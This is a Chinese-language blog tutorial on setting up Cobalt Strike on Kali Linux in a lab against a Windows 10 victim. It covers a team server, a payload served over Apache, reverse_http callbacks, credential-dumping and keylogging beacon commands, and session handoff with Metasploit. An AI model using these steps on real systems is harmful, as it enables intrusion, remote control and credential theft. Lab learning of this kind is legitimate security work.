Cobalt Strike从入门到放弃


Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界大佬称为CS。本文将会讲述如何在kali Linux安装Cobalt Strike以及使用这款神器。希望给各位一点帮助。

环境介绍

  • kali linux 2021
  • Cobalt Strike4.3
  • windows10(受害机)

在kali中安装Cobalt Strike

在kali中安装很简单,Cobalt Strike是基于Java的。因为kali中已经安装了Java环境,所以我们直接可以运行Cobalt Strike。进入Cobalt Strike目录,执行./start.sh即可运行Cobalt Strike。这样便启动了Cobalt Strike 如上会提示登录 这时我们需要启动登录服务,因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令:

./teamserver 192.168.123.33 pass66
#./teamserver kali的ip 登录密码

生成shell

首先配置监听和msfconsole类似,Cobalt Strike也要配置监听。Cobalt Strike——Listeners——Add相关参数说明:

参数 说明
name 监听任务的名称 可随意
payload 监听的方式 支持http https TCP
HTTPS HOSTS 主机IP地址
Host Rotation Strategy 主机转移策略 一般默认即可

生成shellAttacksPackages——windows ececutable

配置windows平台下的shell保存生成的shell

参数 说明
HTML Application 基于http方式的攻击,如受害者打开网站即可获得shell
MS Office Macro office宏攻击,如打开word文档即可获得shell
Payload Generator 其他方式的payload,如C python vb
windows ececutable 生成windows平台下的shell

Shell上线将生成的shell放到/var/www/html,并启动apache服务器

cp kali.exe /var/www/html
service apache2 start

当目标主机下载并运行shell后,我们便可以看到回弹。

对目标主机的操作

interact 命令模式

当我们点击interact后,便会和msfconsole一样,进入命令模式。现列出常用的命名

参数 说明
argue 匹配进程的欺骗参数
blockdlls 阻止子进程中的非Microsoft DLL
browserpivot 设置浏览器会话
cancel 取消正在进行的下载
cd 改变目录位置
checkin 呼叫总部并发布数据
chromedump 从Google Chrome恢复凭据
clear 清除信标队列
connect 通过TCP连接到目标
covertvpn 部署隐蔽VPN客户端
cp 复制文件
dcsync 从DC提取密码哈希
desktop 查看目标桌面并与之交互
dllinject bbskali.cn
dllload 将反射DLL注入进程
download 文件下载
downloads 列出正在下载的文件
drives 列出目标上的驱动器
elevate 在提升的上下文中生成会话
exit 关闭当前连接
getprivs 对当前令牌启用系统权限
getsystem 提升系统权限
getuid 获取用户ID
hashdump 导出hash密码
keylogger 记录键盘
kill Kill 掉进程
logonpasswords 使用mimikatz转储凭据和哈希
ls 列出文件列表 bbskali.cn
make_token 创建一个 token
mimikatz 运行神器 mimikatz
mkdir 创建一个目录
mv 移动文件
net 网络和主机枚举
upload 上传文件

如获取C盘文件信息

cd /
ls

和目标屏幕交互

desktop

其他菜单操作

由于比较多,就不一个个说了。把常用的几个菜单说说。

可视化的文件浏览

Explore-File Browser对局域网内所有设备扫描显示目标的所有进程

Cobalt Strike与Msfconsole联动

首先我们在Cobalt Strike中创建一个新的Foreign Http监听然后在msfconsole中配置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.123.33
set LPORT 4444
exploit

返回Cobalt Strike,选择目标,右键Spawn选择我们前面配置的Foreign Http监听这时,我们返回到msf中便可以看到成功得到回弹。

将msf会话转移到Cobalt Strike

一样,我们先建立一个http的监听因为在msf中我们已经获得了session 在其配置如下:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST 192.168.123.33
set LPORT 5555
set SESSION 1
run

set DisablePayloadHandler true 作用是msf不监听,代表是用来返给其他监听的 。然后我们返回到Cobalt Strike这时便可以看到会话了

其他文章推荐

《Cobalt Strike 目标上线微信提示》

《Cobalt Strike入坑指南(利用office文件获取shell)》

更多教程 扫码关注

扫码加微信群

论坛地址:bbskali.cn(阅读原文 快速访问)

请使用浏览器的分享功能分享到微信等